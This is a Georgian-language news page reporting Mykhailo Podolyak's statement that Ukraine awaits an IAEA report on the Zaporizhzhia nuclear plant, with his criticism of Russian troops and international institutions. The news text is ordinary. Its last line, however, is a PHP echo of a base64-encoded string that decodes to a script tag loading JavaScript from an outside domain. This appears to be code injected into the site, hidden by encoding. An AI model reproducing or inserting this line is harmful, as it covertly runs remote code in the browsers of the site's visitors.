celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩევლის, მიხაილო პოდოლიაკის განცხადებით, მთავრობა ჯერ კიდევ ელოდება ატომური ენერგიის საერთაშორისო სააგენტოს ანგარიშს ზაპოროჟიეს ატომურ ელექტროსადგურზე არსებული ვითარების შესახებ. 
 
პოდოლიაკის თქმით, ქარხანაში უნდა ჩატარდეს "ბირთვული აუდიტი", რომელშიც მონაწილეობას მიიღებენ "ატომური ფიზიკისა და საინჟინრო ტექნოლოგიების მცოდნე ადამიანები“ უკრაინელ პერსონალთან ერთად. მანვე დასძინა, რომ რუსული ჯარები რისკებს სწორად ვერ აფასებენ.
 
„ჩვენ არ გვესმის, არის თუ არა იქ ყველაფერი ნორმაში უსაფრთხოებისა და რეაქტორების გაგრილების კუთხით, პერსონალის კუთხით, ესმით თუ არა მათ ალგორითმები, რომლითაც მუშაობენ. ეს ყველაფერი ანგარიშში არ გვინახავს და ეს ადასტურებს, რომ საერთაშორისო ინსტიტუტები სამწუხაროდ, სრულიად არაეფექტურია.
 
არიან რუსი სამხედროები, რომლებსაც არ ესმით, რა ხდება იქ, ისინი არ აფასებენ რისკებს სწორად. მაგრამ არის ჩვენი მუშების გარკვეული რაოდენობა, რომლებსაც სჭირდებათ დაცვა და ის, რომ მათ გვერდით საერთაშორისო საზოგადოება იდგეს”, - განაცხადა პოდოლიაკმა.
507
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");